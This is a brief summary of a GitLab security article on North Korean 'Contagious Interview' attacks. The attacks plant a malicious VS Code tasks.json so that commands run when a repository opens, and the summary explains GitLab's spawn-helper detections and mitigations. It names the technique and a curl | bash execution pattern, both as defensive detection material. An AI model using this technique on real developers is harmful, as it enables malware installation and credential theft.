GitLab's Security Operations team, including Threat Intelligence and SIRT, collaborates closely to combat evolving threats. They recently published an article detailing North Korean tradecraft, specifically targeting malicious use of VS Code tasks. The Contagious Interview campaign leverages fake interview processes to trick individuals into running malicious code via tasks. Attackers use a tasks.json file within a compromised repository to execute commands when the repository opens in VS Code. This allows attackers to install malware, steal credentials, and establish persistence on compromised systems. GitLab developed preventative measures by analyzing the node-pty.spawn() library used by VS Code and other IDEs. They created detections based on spawn-helper, which is called for background tasks, to identify suspicious activity. This approach minimizes false positives by focusing on non-interactive processes, such as the curl | bash command execution often used. GitLab also recommends disabling task runs globally or educating users about the risks. This comprehensive approach helps protect GitLab and its customers from IDE-based attacks. GitLab aims to inspire others to combat Advanced Persistent Threats.